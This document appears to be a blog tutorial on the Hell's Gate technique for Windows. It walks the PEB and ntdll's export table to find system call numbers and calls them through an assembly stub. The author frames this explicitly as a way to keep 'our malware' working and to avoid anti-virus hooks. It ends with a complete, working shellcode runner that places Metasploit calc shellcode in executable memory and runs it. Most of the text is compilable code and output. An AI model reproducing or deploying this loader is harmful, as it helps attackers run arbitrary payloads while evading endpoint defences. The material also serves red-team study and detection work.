I’ve previously covered executing code with direct system calls. That approach creates a problem: it hardcodes system call numbers, which future versions of Windows may change.
Hell’s Gate is a method of dynamically looking up system call numbers so our malware will continue to work on future Windows releases.
Using a Debugger
Determining system call values using WinDBG is straightforward. The system calls will be stored in ntdll.dll. We can use the unassemble (“u”) command to view the start of the NtOpenProcess function.
0:028> u ntdll!NtOpenProcess
ntdll!NtOpenProcess:
00007ffb`540e1f00 4c8bd1 mov r10,rcx
00007ffb`540e1f03 b826000000 mov eax,26h
00007ffb`540e1f08 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffb`540e1f10 7503 jne ntdll!NtOpenProcess+0x15 (00007ffb`540e1f15)
00007ffb`540e1f12 0f05 syscall
00007ffb`540e1f14 c3 ret
00007ffb`540e1f15 cd2e int 2Eh
00007ffb`540e1f17 c3 ret
The code moves the system call number (in this case, 0x26) to the EAX register. Line 5 then tests whether to use the syscall instruction for x64 systems or the 0x2e interrupt for 32-bit systems.
Below describe the implementation steps you will need to take.
Define a PEB Data Structure
First, we need to determine the location of the Process Environment Block (PEB) in memory. This data structure provides metadata about the current process.
Since the PEB structure lacks documentation, start by creating a header file “PEB.h” to describe it.
#pragma once
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
typedef struct _PEB_LDR_DATA {
ULONG Length;
BOOLEAN Initialized;
BYTE Reserved1[3];
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
} PEB, * PPEB;
Locate the PEB and Identify the NTDLL.DLL Base Address
The GS segment register will always point to a processes current PEB at offset 0x60. Once we know that, we can traverse the InMemoryOrderModuleList to find loaded modules and their base addresses.
#include <windows.h>
#include <stdio.h>
#include "PEB.h"
int main() {
PPEB Peb = (PPEB)__readgsqword(0x60);
PLIST_ENTRY head = &Peb->Ldr->InMemoryOrderModuleList;
PLIST_ENTRY current = head->Flink;
while (current != head) {
PLDR_DATA_TABLE_ENTRY entry =
(PLDR_DATA_TABLE_ENTRY)((BYTE*)current - sizeof(LIST_ENTRY));
wprintf(L"Module: %ws\n", entry->FullDllName.Buffer);
wprintf(L"Base: %p\n\n", entry->DllBase);
current = current->Flink;
}
return 0;
}
We can see the second entry is ntdll.dll. This is the module we’re interested in, since it contains the system call stubs.
Module: C:\GetPEB\GetPEB.exe
Base: 00007FF6E23E0000
Module: C:\WINDOWS\SYSTEM32\ntdll.dll
Base: 00007FFD78A80000
Module: C:\WINDOWS\System32\KERNEL32.DLL
Base: 00007FFD77950000
Module: C:\WINDOWS\System32\KERNELBASE.dll
Base: 00007FFD75FB0000
Module: C:\WINDOWS\SYSTEM32\VCRUNTIME140D.dll
Base: 00007FFD64A40000
Module: C:\WINDOWS\SYSTEM32\ucrtbased.dll
Base: 00007FFD1DD60000
Parse the NTDLL.dll Export Address Table
Next, we need to modify the code to list only functions in the ntdll.dll module. We do this by parsing the modules Export Address Table using the FindExport function.
#include <windows.h>
#include <stdio.h>
#include <wchar.h>
#include "PEB.h"
PVOID GetModuleBase(const wchar_t* moduleName) {
#ifdef _M_X64
PPEB peb = (PPEB)__readgsqword(0x60);
#else
PPEB peb = (PPEB)__readfsdword(0x30);
#endif
if (!peb || !peb->Ldr) return NULL;
PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;
PLIST_ENTRY current = head->Flink;
while (current && current != head) {
PLDR_DATA_TABLE_ENTRY entry =
CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
if (entry->BaseDllName.Buffer &&
entry->BaseDllName.Length > 0 &&
entry->BaseDllName.Length < 512)
{
if (_wcsicmp(entry->BaseDllName.Buffer, moduleName) == 0) {
return entry->DllBase;
}
}
current = current->Flink;
}
return NULL;
}
PVOID FindExport(const wchar_t* moduleName, const char* functionName) {
BYTE* base = (BYTE*)GetModuleBase(moduleName);
if (!base) return NULL;
IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;
IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
if (nt->Signature != IMAGE_NT_SIGNATURE) return NULL;
IMAGE_DATA_DIRECTORY dir =
nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (!dir.VirtualAddress || !dir.Size) return NULL;
IMAGE_EXPORT_DIRECTORY* exp =
(IMAGE_EXPORT_DIRECTORY*)(base + dir.VirtualAddress);
DWORD* functions = (DWORD*)(base + exp->AddressOfFunctions);
DWORD* names = (DWORD*)(base + exp->AddressOfNames);
WORD* ordinals = (WORD*)(base + exp->AddressOfNameOrdinals);
for (DWORD i = 0; i < exp->NumberOfNames; i++) {
const char* name = (const char*)(base + names[i]);
if (strcmp(name, functionName) == 0) {
DWORD rva = functions[ordinals[i]];
return base + rva;
}
}
return NULL;
}
int main() {
PVOID addr = FindExport(L"ntdll.dll", "NtAllocateVirtualMemory");
if (addr) {
printf("NtAllocateVirtualMemory: %p\n", addr);
}
else {
printf("Function not found.\n");
}
return 0;
}
Running the code should print the base address of the NtAllocateVirtualMemory function.
NtAllocateVirtualMemory: 00007FFD78BE1DF0
With the module base address, we can scan the first 32 bytes for the opcode to move a value to the EAX register (0xB8).
DWORD GetSyscallNumber(PVOID func) {
BYTE* p = (BYTE*)func;
// scan first 32 bytes for "mov eax, imm32"
for (int i = 0; i < 32; i++) {
if (p[i] == 0xB8) { // opcode for mov eax, imm32
return *(DWORD*)(p + i + 1);
}
}
return 0;
}
Syscall Lookup Code
The following code implements our syscall lookup functionality.
#include <windows.h>
#include <stdio.h>
#include <wchar.h>
#include "PEB.h"
PVOID GetModuleBase(const wchar_t* moduleName) {
#ifdef _M_X64
PPEB peb = (PPEB)__readgsqword(0x60);
#else
PPEB peb = (PPEB)__readfsdword(0x30);
#endif
if (!peb || !peb->Ldr) return NULL;
PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;
PLIST_ENTRY current = head->Flink;
while (current && current != head) {
PLDR_DATA_TABLE_ENTRY entry =
CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
if (entry->BaseDllName.Buffer &&
entry->BaseDllName.Length > 0 &&
entry->BaseDllName.Length < 512)
{
if (_wcsicmp(entry->BaseDllName.Buffer, moduleName) == 0) {
return entry->DllBase;
}
}
current = current->Flink;
}
return NULL;
}
PVOID FindExport(const wchar_t* moduleName, const char* functionName) {
BYTE* base = (BYTE*)GetModuleBase(moduleName);
if (!base) return NULL;
IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;
IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
if (nt->Signature != IMAGE_NT_SIGNATURE) return NULL;
IMAGE_DATA_DIRECTORY dir =
nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (!dir.VirtualAddress || !dir.Size) return NULL;
IMAGE_EXPORT_DIRECTORY* exp =
(IMAGE_EXPORT_DIRECTORY*)(base + dir.VirtualAddress);
DWORD* functions = (DWORD*)(base + exp->AddressOfFunctions);
DWORD* names = (DWORD*)(base + exp->AddressOfNames);
WORD* ordinals = (WORD*)(base + exp->AddressOfNameOrdinals);
for (DWORD i = 0; i < exp->NumberOfNames; i++) {
const char* name = (const char*)(base + names[i]);
if (strcmp(name, functionName) == 0) {
DWORD rva = functions[ordinals[i]];
return base + rva;
}
}
return NULL;
}
DWORD GetSyscallNumber(PVOID func) {
BYTE* p = (BYTE*)func;
// scan first 32 bytes for "mov eax, imm32"
for (int i = 0; i < 32; i++) {
if (p[i] == 0xB8) { // opcode for mov eax, imm32
return *(DWORD*)(p + i + 1);
}
}
return 0;
}
int main() {
const char* functions[] = {
"NtAllocateVirtualMemory",
"NtWriteVirtualMemory",
"NtCreateThreadEx",
"NtOpenProcess",
};
int count = sizeof(functions) / sizeof(functions[0]);
for (int i = 0; i < count; i++) {
PVOID addr = FindExport(L"ntdll.dll", functions[i]);
if (!addr) {
printf("%s: not found\n\n", functions[i]);
continue;
}
printf("%s: %p\n", functions[i], addr);
DWORD syscall = GetSyscallNumber(addr);
if (syscall == 0) {
printf(" syscall: not detected\n\n");
}
else {
printf(" syscall: 0x%X (%u)\n\n", syscall, syscall);
}
}
return 0;
}
We can see the code has successfully resolved all the system call numbers we would need to execute shellcode 🙂
NtAllocateVirtualMemory: 00007FFD78BE1DF0
syscall: 0x18 (24)
NtWriteVirtualMemory: 00007FFD78BE2230
syscall: 0x3A (58)
NtCreateThreadEx: 00007FFD78BE3400
syscall: 0xC9 (201)
NtOpenProcess: 00007FFD78BE1FB0
syscall: 0x26 (38)
Entering Hell
Now we have all the system call numbers, we still need a method of invoking them. We can’t execute a system call directly from C, so we will need to use an inline ASM stub.
In Visual Studio go to Project on the menu and select Build Customisations. Enable MASM.
Create a MASM file Syscall.asm with the following code. Right click the file and select Properties > Item Type. Set this to Microsoft Macro Assembler.
.data
wSystemCall DWORD 000h
.code
HellsGate PROC
mov wSystemCall, 000h
mov wSystemCall, ecx
ret
HellsGate ENDP
HellDescent PROC
mov r10, rcx
mov eax, wSystemCall
syscall
ret
HellDescent ENDP
end
The HellsGate function is used to select the system call to be invoked. It takes the first supplied argument (that will be in ECX) and stores it in wSystemCall. This is the system call value we supply from C++.
HellDescent is the function to actually executes the system call.
Technically, the logic of both functions could be merged into a single function. This pattern can be beneficial if you want to execute the same system call multiple times.
Back in our C code, we will want to use the extern keyword to reference the functions declared in the ASM file.
extern "C" {
void HellsGate(WORD wSystemCall);
// Using variadic arguments (...) allows you to pass any number of arguments to the syscall
NTSTATUS HellDescent(...);
}
Using the variadic arguments as defined above allow us to supply an arbitary number of parameters. The first four will be placed in registers as below, the rest will be placed on the stack.
| Register | Argument |
|---|---|
| RCX | arg1 |
| RDX | arg2 |
| R8 | arg3 |
| R9 | arg4 |
| R10 | Copy of RCX |
| EAX | Syscall number |
Finally, to turn this into a shellcode runner, we would need to call NtAllocateVirtualMemory, NtWriteVirtualMemory and NtCreateThreadEx.
//SYSCALL NtAllocateVirtualMemory
PVOID addr = FindExport(L"ntdll.dll", "NtAllocateVirtualMemory");
DWORD syscall = GetSyscallNumber(addr);
printf(" syscall: 0x%X (%u)\n\n", syscall, syscall);
HellsGate(syscall);
PVOID baseAddress = NULL;
SIZE_T shellcodeSizeAllocated = shellcodeSize;
NTSTATUS status = HellDescent(
(void*)(HANDLE)-1, // ProcessHandle (Current process)
&baseAddress,
0,
&shellcodeSizeAllocated,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
printf("Status: 0x%X\n", status);
//SYSCALL NtWriteVirtualMemory
PVOID addrWrite = FindExport(L"ntdll.dll", "NtWriteVirtualMemory");
DWORD syscallWrite = GetSyscallNumber(addrWrite);
printf("NtWriteVirtualMemory syscall: 0x%X\n", syscallWrite);
SIZE_T bytesWritten = 0;
HellsGate(syscallWrite);
printf("Actual size: %zu\n", shellcodeSize);
status = HellDescent(
(HANDLE)-1,
baseAddress,
shellcode,
(SIZE_T)shellcodeSize,
NULL
);
if (status == 0) {
printf("Shellcode is in memory at %p.\n", baseAddress);
}
else {
printf("Failed to write memory. Status: 0x%X\n", status);
}
//SYSCALL NtCreateThreadEx
PVOID addrThread = FindExport(L"ntdll.dll", "NtCreateThreadEx");
DWORD syscallThread = GetSyscallNumber(addrThread);
HellsGate(syscallThread);
HANDLE hThread = NULL;
status = HellDescent(
&hThread, // 1. ThreadHandle
THREAD_ALL_ACCESS, // 2. DesiredAccess
NULL, // 3. ObjectAttributes
(HANDLE)-1, // 4. ProcessHandle
baseAddress, // 5. StartAddress (The shellcode)
NULL, // 6. Parameter
FALSE, // 7. CreateFlags
0, // 8. ZeroBits
0, // 9. StackSize
0, // 10. MaxStackSize
NULL // 11. AttributeList
);
if (status == 0 && hThread != NULL) {
printf("Thread created successfully! Handle: %p\n", hThread);
WaitForSingleObject(hThread, INFINITE);
}
else {
printf("Failed to create thread. Status: 0x%X\n", status);
}
Complete Code Listing
#include <windows.h>
#include <stdio.h>
#include <wchar.h>
#include "PEB.h"
PVOID GetModuleBase(const wchar_t* moduleName) {
#ifdef _M_X64
PPEB peb = (PPEB)__readgsqword(0x60);
#else
PPEB peb = (PPEB)__readfsdword(0x30);
#endif
if (!peb || !peb->Ldr) return NULL;
PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;
PLIST_ENTRY current = head->Flink;
while (current && current != head) {
PLDR_DATA_TABLE_ENTRY entry =
CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
if (entry->BaseDllName.Buffer &&
entry->BaseDllName.Length > 0 &&
entry->BaseDllName.Length < 512)
{
if (_wcsicmp(entry->BaseDllName.Buffer, moduleName) == 0) {
return entry->DllBase;
}
}
current = current->Flink;
}
return NULL;
}
PVOID FindExport(const wchar_t* moduleName, const char* functionName) {
BYTE* base = (BYTE*)GetModuleBase(moduleName);
if (!base) return NULL;
IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;
IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
if (nt->Signature != IMAGE_NT_SIGNATURE) return NULL;
IMAGE_DATA_DIRECTORY dir =
nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (!dir.VirtualAddress || !dir.Size) return NULL;
IMAGE_EXPORT_DIRECTORY* exp =
(IMAGE_EXPORT_DIRECTORY*)(base + dir.VirtualAddress);
DWORD* functions = (DWORD*)(base + exp->AddressOfFunctions);
DWORD* names = (DWORD*)(base + exp->AddressOfNames);
WORD* ordinals = (WORD*)(base + exp->AddressOfNameOrdinals);
for (DWORD i = 0; i < exp->NumberOfNames; i++) {
const char* name = (const char*)(base + names[i]);
if (strcmp(name, functionName) == 0) {
DWORD rva = functions[ordinals[i]];
return base + rva;
}
}
return NULL;
}
DWORD GetSyscallNumber(PVOID func) {
BYTE* p = (BYTE*)func;
// scan first 32 bytes for "mov eax, imm32"
for (int i = 0; i < 32; i++) {
if (p[i] == 0xB8) { // opcode for mov eax, imm32
return *(DWORD*)(p + i + 1);
}
}
return 0;
}
extern "C" {
void HellsGate(WORD wSystemCall);
// Using variadic arguments (...) allows you to pass
// any number of arguments to the syscall
NTSTATUS HellDescent(...);
}
int main() {
// MSF Calc Shellcode
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
//unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xEB, 0xFE };
SIZE_T shellcodeSize = sizeof(shellcode);
//SYSCALL NtAllocateVirtualMemory
PVOID addr = FindExport(L"ntdll.dll", "NtAllocateVirtualMemory");
DWORD syscall = GetSyscallNumber(addr);
printf(" syscall: 0x%X (%u)\n\n", syscall, syscall);
HellsGate(syscall);
PVOID baseAddress = NULL;
SIZE_T shellcodeSizeAllocated = shellcodeSize;
NTSTATUS status = HellDescent(
(void*)(HANDLE)-1, // ProcessHandle (Current process)
&baseAddress,
0,
&shellcodeSizeAllocated,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
printf("Status: 0x%X\n", status);
//SYSCALL NtWriteVirtualMemory
PVOID addrWrite = FindExport(L"ntdll.dll", "NtWriteVirtualMemory");
DWORD syscallWrite = GetSyscallNumber(addrWrite);
printf("NtWriteVirtualMemory syscall: 0x%X\n", syscallWrite);
SIZE_T bytesWritten = 0;
HellsGate(syscallWrite);
printf("Actual size: %zu\n", shellcodeSize);
status = HellDescent(
(HANDLE)-1,
baseAddress,
shellcode,
(SIZE_T)shellcodeSize,
NULL
);
if (status == 0) {
printf("Shellcode is in memory at %p.\n", baseAddress);
}
else {
printf("Failed to write memory. Status: 0x%X\n", status);
}
//SYSCALL NtCreateThreadEx
PVOID addrThread = FindExport(L"ntdll.dll", "NtCreateThreadEx");
DWORD syscallThread = GetSyscallNumber(addrThread);
HellsGate(syscallThread);
HANDLE hThread = NULL;
status = HellDescent(
&hThread, // 1. ThreadHandle
THREAD_ALL_ACCESS, // 2. DesiredAccess
NULL, // 3. ObjectAttributes
(HANDLE)-1, // 4. ProcessHandle
baseAddress, // 5. StartAddress (The shellcode)
NULL, // 6. Parameter
FALSE, // 7. CreateFlags
0, // 8. ZeroBits
0, // 9. StackSize
0, // 10. MaxStackSize
NULL // 11. AttributeList
);
if (status == 0 && hThread != NULL) {
printf("Thread created successfully! Handle: %p\n", hThread);
WaitForSingleObject(hThread, INFINITE);
}
else {
printf("Failed to create thread. Status: 0x%X\n", status);
}
return 0;
}
In Conclusion
Although this process is slightly convoluted, the Hell’s Gate method of identifying system call numbers by parsing the export address table negates the need to call functions like GetModuleHandleA or GetProcAddress, which may be hooked by Anti-Virus providers.
It should be noted, that the original POC implements a method of performing lookups once, and storing the results in a lookup table. For the sake of brevity, I’ve omitted this.
The original research paper for Hell’s Gate can be found here.